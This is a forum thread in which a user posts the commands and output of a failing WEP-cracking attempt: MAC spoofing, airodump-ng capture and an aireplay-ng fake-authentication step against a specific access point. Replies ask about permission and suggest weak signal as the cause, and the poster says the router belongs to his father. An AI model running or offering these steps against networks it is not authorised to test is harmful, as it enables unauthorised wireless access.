Results 1 to 9 of 9

Thread: Help Correct My Attack

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    4

    Default Help Correct My Attack

    I have a netgear wg511t pcmcia card. I have done a successful WEP crack before using this card and this method but for some reason this isn't working with the particular AP in question.

    Step 1
    Code:
    airmon-ng stop ath0
    ifconfig wifi0 down
    macchanger --mac 00:11:22:33:44:55 wifi0
    airmon-ng start wifi0
    Step 2
    Code:
    airodump-ng ath0
    Returns..

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:0F:3D:29:86:6F 46 100 6519 1362 1 6 54. WEP WEP default
    00:15:E9:E4:28:C9 6 1 4968 24 0 6 54. WEP WEP default
    00:19:5B:E0:95:58 17 0 4587 0 0 6 54. WEP WEP OPN PenTestNetwork
    00:11:95:2C:51:E4 1 0 233 8 0 6 54. OPN hawkes
    00:90:4C:7E:00:10 -1 0 0 0 0 6 -1 telstra

    Step 3
    Code:
    airodump-ng -c 6 -w dumpfile --bssid 00:19:5B:E0:95:58 ath0
    aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
    Now it is the aireplay-ng command which isn't being successful. I get,

    Code:
    bt ~ # aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
    13:09:40  Sending Authentication Request
    13:09:40  Authentication successful
    13:09:40  Sending Association Request
    13:09:45  Sending Authentication Request
    13:09:45  Authentication successful
    13:09:45  Sending Association Request
    13:09:50  Sending Authentication Request
    13:09:50  Authentication successful
    13:09:50  Sending Association Request
    13:09:55  Sending Authentication Request
    13:09:55  Authentication successful
    13:09:55  Sending Association Request
    13:10:00  Sending Authentication Request
    13:10:00  Authentication successful
    13:10:00  Sending Association Request
    13:10:05  Sending Authentication Request
    13:10:05  Authentication successful
    13:10:05  Sending Association Request
    13:10:10  Sending Authentication Request
    13:10:10  Authentication successful
    13:10:10  Sending Association Request
    13:10:15  Sending Authentication Request
    13:10:15  Authentication successful
    13:10:15  Sending Association Request
    13:10:20  Sending Authentication Request
    13:10:20  Authentication successful
    13:10:20  Sending Association Request
    13:10:25  Sending Authentication Request
    13:10:25  Authentication successful
    13:10:25  Sending Association Request
    13:10:30  Sending Authentication Request
    13:10:30  Authentication successful
    13:10:30  Sending Association Request
    13:10:35  Sending Authentication Request
    13:10:36  Authentication successful
    13:10:36  Sending Association Request
    13:10:43  Sending Authentication Request
    
    Attack was unsuccessful. Possible reasons:
    
        * Perhaps MAC address filtering is enabled.
        * Check that the BSSID (-a option) is correct.
        * Try to change the number of packets (-o option).
        * The driver hasn't been patched for injection.
        * This attack sometimes fails against some APs.
        * The card is not on the same channel as the AP.
        * Injection is not supported AT ALL on HermesI,
          Centrino, ndiswrapper and a few others chipsets.
        * You're too far from the AP. Get closer, or lower
          the transmit rate (iwconfig <iface> rate 1M).
    Can anyone help me out? Give me some ideas?

  2. #2
    Member
    Join Date
    Mar 2010
    Posts
    87

    Default

    your AP or someone else's? do you have permission?

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    sounds like the victim ap have mac filtering enabled........
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #4
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Not being a troll or anything but I think its because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.

    also:

    MAC: 00:19:5B:E0:95:58
    PWR:17
    RXQ: 0

    Very low signal!!!

    And Because of that make me think that the AP in question is not yours so I'm not going to say anymore.

    I appologize if I am wrong

  5. #5
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    How far are you from the AP and what kind of model is the AP?
    dd if=/dev/swc666 of=/dev/wyze

  6. #6
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    4

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    Not being a troll or anything but I think its because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.

    also:

    MAC: 00:19:5B:E0:95:58
    PWR:17
    RXQ: 0

    Very low signal!!!

    And Because of that make me think that the AP in question is not yours so I'm not going to say anymore.

    I appologize if I am wrong
    Apology accepted

    Quote Originally Posted by swc666 View Post
    How far are you from the AP and what kind of model is the AP?
    It's a D-Link and it's down 1 flight of stairs and about 20 metres away. The router is in my dad's study and i was sitting in my room, upstairs on the other side of the house.

    The PWR level was fluctuating between 15 and 25. So moving closer should help?

    My dad said he doesn't even know what mac filtering is so i'm pretty sure it's not enabled.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •